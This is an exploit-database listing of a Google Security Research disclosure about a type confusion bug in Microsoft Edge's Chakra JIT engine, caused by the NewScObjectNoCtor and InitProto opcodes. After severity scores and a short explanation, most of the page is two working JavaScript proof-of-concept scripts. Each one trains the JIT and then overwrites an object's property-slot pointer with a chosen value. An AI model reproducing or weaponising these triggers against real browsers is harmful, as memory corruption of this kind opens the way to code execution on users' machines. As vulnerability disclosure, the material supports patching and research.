Microsoft Edge Chakra - NewScObjectNoCtor or InitProto Type Confusion Exploit

2019-01-2000:00:00

Google Security Research

0day.today

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

7.6 High

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:H/Au:N/C:C/I:C/A:C

0.966 High

EPSS

Percentile

99.5%

JSON

NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.

In the PoC, it overwrites the pointer to property slots with 0x1000000001234. 

PoC for NewScObjectNoCtor:

function cons() {

}

function opt(o, value) {
    o.b = 1;

    new cons();

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        cons.prototype = {};

        let o = {a: 1, b: 2};
        opt(o, {});
    }

    let o = {a: 1, b: 2};

    cons.prototype = o;

    opt(o, 0x1234);

    print(o.a);
}

main();

PoC for InitProto:

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, 0x1234);

    print(o.a);
}

main();